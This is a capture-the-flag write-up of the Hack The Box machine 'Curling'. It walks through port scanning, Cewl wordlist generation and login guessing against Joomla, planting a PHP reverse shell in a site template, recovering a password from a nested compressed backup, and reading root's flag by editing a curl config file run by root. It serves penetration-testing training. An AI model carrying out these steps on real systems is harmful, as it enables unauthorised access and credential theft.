Curling
https://app.hackthebox.com/machines/Curling
Last updated
https://app.hackthebox.com/machines/Curling
Last updated
sudo nmap 10.10.10.150 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelChecking the web server we are presented with the page for the "Cewl Curling site".
Looking at the site icon we can see the target web server is running Joomla. Running joomscan against the host reveals Joomla is running on version 3.8.8.
However, I was unable to identify any immediate exploit for this particular host. Back to the root page and the main site header "Cewl" is a hint for the tool Cewl.
Cewl is a tool which can create custom word lists by spidering URL's looking for words. I used the command below to generate a custom word list and specified a minimum length of five.
cewl http://10.10.10.150/ -d 5 -m 5 -o --with-numbersAfter generating the word list I attempted a quick logon attempt to capture the request through ZAProxy.
After capturing the request I set the username as "super user" as this is the name given on the main home page blog entries and then set the password variable to the list generated by Cewl.
However, I was unable to get in with the username and password list. Looking at the list of passwords generated by Cewl we have an entry for curling2018. Which looks like a potential password. As this did not work I will instead write a few potential editions of this word.
curling2018
curling2019
curling2020
Curling2018
Curling2019
Curling2020
curling2018!
curling2019!
curling2020!
Curling2018!
Curling2019!
Curling2020!As well as this we notice one of the blog posts are signed off by the user Floris.
Repeating the login requests again with ZAP using the new username and revised password list we get a hit for the following credentials: floris:Curling2018!.
After confirming the credentials are correct we find they are reused on the administrative login located at http://10.10.10.150/administrator/index.php.
A quick Google search shows various articles for obtaining a reverse shell through the use of Joomla after obtaining administrative credentials.
URL: https://cheatsheet.haax.fr/web-pentest/content-management-system-cms/joomla/#reverse-shell
Using the same steps as specified above we insert a pentest monkey PHP reverse shell under index.php in the template for protostar.
After setting up a listener and refreshing /index.php to trigger the shell we receive a connection back.
Check the user floris' home directory we find we are unable to read the user.txt flag.
We do have a file of interest within the home directory "password_backup". Reading the ASCII file shows what appears to be a hex / packet dump.
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
000000f0: 819b bb48 ...HLooking at the magic bytes at the beginning of the output and running it through Cyberchef we identify the bytes as belonging to a Bzip2 file.
the binary xxd can be used to rebuild the file as shown below.
xxd -r password_backup > /tmp/password_fileAfter rebuilding the file we need to iterate through multiple compression archives to extract the original document.
bzip2 -d password_file
mv password_file.out password_file.gz
gzip -d password_file.gz
bzip2 -d password_file
mv password_file.out password_file.tar
tar -xvf password_file.tar
cat password.txtReading password.txt gives us the SSH password for the user floris.
Password: 5d<wdCbdZu)|hChXll
We are then able to authenticate over SSH.
Where we can now grab the user.txt flag.
In our home directory we have a directory named "admin-area". Which consists of two files which are owned by root and modifiable by floris.
Runing pspy on the target system we get a better insight at what might be happening in this directory. We can see that periodically the command /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report is running.
We know that now root is executing curl on the contents of input and outputting it to report. Checking GTFOBins shows that curl can be used to perform privileged reads.
GTFOBins: https://gtfobins.github.io/gtfobins/curl/
We can use nano to edit the contents of input so we can read the root.txt flag.
url = "file:///root/root.txt"After making the required changes we can use the watch command to monitor the report file for any changes.
watch cat reportAfter a couple of minutes we see the contents of the root flag.
